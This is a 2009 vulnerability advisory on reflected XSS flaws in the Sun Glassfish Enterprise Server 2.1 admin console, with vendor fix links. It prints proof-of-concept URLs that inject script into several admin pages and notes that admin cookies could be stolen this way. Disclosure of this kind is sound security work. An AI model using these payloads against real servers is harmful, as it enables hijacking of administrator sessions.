Digital Security Research Group [DSecRG] Advisory #DSECRG-09-034 Original advisory: http://dsecrg.com/pages/vul/show.php?id=134 Application: Sun Glassfish Enterprise Server Versions Affected: 2.1 Vendor URL: https://glassfish.dev.java.net/ Bug: Multiple Linked XSS vulnerabilities Exploits: YES Reported: 19.03.2009 Vendor response: 20.03.2009 Solution: YES Date of Public Advisory: 05.05.2009 Author: Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *********** Glassfish Enterprise Server Admin Console has multiple linked XSS vulnerabilities. Details ******* Using this vulnerability attacker can steal admin's cookie and then authentificate as administrator or perform certain administrative actions. 1. Multiple Linked XSS vulnerabilities. Many pages have typical XSS vulnerability. Attacker can inject XSS in URL string. Example: http://[server]/applications/applications.jsf?');};alert("DSecRG_XSS");< /script><!-- http://[server]/configuration/configuration.jsf?');};alert("DSecRG_XSS") ;</script><!-- http://[server]/customMBeans/customMBeans.jsf?');};alert("DSecRG_XSS");< /script><!-- http://[server]/resourceNode/resources.jsf?');};alert("DSecRG_XSS");</sc ript><!-- http://[server]/sysnet/registration.jsf?');};alert("DSecRG_XSS");</scrip t><!-- http://[server]/webService/webServicesGeneral.jsf?');};alert("DSecRG_XSS ");</script><!-- Response HTML Code: ------------------- ################################################# ... <script type="text/javascript"> var myonload = new Object(); myonload.oldonload = window.onload; myonload.newonload = function() { if ('/applications/applications.jsf?');};alert("DSecRG_XSS");</script><!--' != '') { ... ################################################# 2. Multiple Linked XSS vulnerabilities in GET parameter "name". Many pages have typical XSS vulnerability in GET parameter "name". Attacker can inject XSS in URL string. Example: http://[server]/configuration/auditModuleEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')> http://[server]/configuration/httpListenerEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>&configName=server-config http://[server]/resourceNode/jdbcResourceEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')> Solution ******** This security vulnerabilities fixed in CVS. The following links to the commit email messages for all the changes to fix these issues: https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29669 https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29668 https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29675 Credits ******* http://www.nabble.com/Re:--DSECRG--Sun-Glassfish-Multiple-Security-Vulne rabilities-p23002524.html About ***** Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.dsec.ru